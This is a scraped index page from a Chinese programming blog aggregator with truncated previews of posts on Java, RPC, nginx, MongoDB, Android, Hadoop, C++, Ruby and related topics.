    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他